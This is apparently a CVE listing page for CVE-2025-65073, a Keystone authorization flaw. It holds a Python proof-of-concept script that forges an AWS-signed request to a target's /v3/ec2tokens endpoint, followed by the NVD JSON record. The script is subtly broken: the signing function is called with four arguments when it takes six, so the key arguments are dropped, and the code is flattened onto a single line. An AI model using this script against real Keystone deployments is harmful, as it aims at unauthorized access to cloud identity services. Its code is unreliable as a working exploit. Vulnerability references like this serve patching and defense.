CVE-2025-65073

import requests import hashlib import hmac import datetime # AWS Signature Version 4 implementation def create_aws_signature(access_key, secret_key, method, host, uri, body=''): now = datetime.datetime.utcnow() amz_date = now.strftime('%Y%m%dT%H%M%SZ') date_stamp = now.strftime('%Y%m%d') # Create canonical request payload_hash = hashlib.sha256(body.encode()).hexdigest() canonical_headers = f'host:{host}\nx-amz-date:{amz_date}\n' signed_headers = 'host;x-amz-date' canonical_request = f'{method}\n{uri}\n\n{canonical_headers}\n{signed_headers}\n{payload_hash}' # Create string to sign credential_scope = f'{date_stamp}/us-east-1/iam/aws4_request' hashed_canonical = hashlib.sha256(canonical_request.encode()).hexdigest() string_to_sign = f'AWS4-HMAC-SHA256\n{amz_date}\n{credential_scope}\n{hashed_canonical}' # Calculate signature k_date = hmac.new(f'AWS4{secret_key}'.encode(), date_stamp.encode(), hashlib.sha256).digest() k_region = hmac.new(k_date, b'us-east-1', hashlib.sha256).digest() k_service = hmac.new(k_region, b'iam', hashlib.sha256).digest() k_signing = hmac.new(k_service, b'aws4_request', hashlib.sha256).digest() signature = hmac.new(k_signing, string_to_sign.encode(), hashlib.sha256).hexdigest() authorization = f'AWS4-HMAC-SHA256 Credential={access_key}/{credential_scope}, SignedHeaders={signed_headers}, Signature={signature}' return amz_date, authorization # Target OpenStack Keystone endpoint keystone_url = 'http://target-keystone:5000/v3/ec2tokens' host = 'target-keystone:5000' access_key = 'YOUR_AWS_ACCESS_KEY' secret_key = 'YOUR_AWS_SECRET_KEY' amz_date, auth_header = create_aws_signature('POST', host, '/v3/ec2tokens', '{}') headers = { 'Content-Type': 'application/json', 'X-Amz-Date': amz_date, 'Authorization': auth_header, 'Host': host } data = { 'ec2Credentials': { 'access': access_key, 'secret': secret_key } } response = requests.post(keystone_url, json=data, headers=headers) print('Status:', response.status_code) print('Response:', response.json())

{"cve": {"id": "CVE-2025-65073", "sourceIdentifier": "[email protected]", "published": "2025-11-17T08:16:25.600", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenStack Keystone before 26.0.1, 27.0.0, and 28.0.0 allows a /v3/ec2tokens or /v3/s3tokens request with a valid AWS Signature to provide Keystone authorization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://www.openwall.com/lists/oss-security/2025/11/04/2", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/17/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}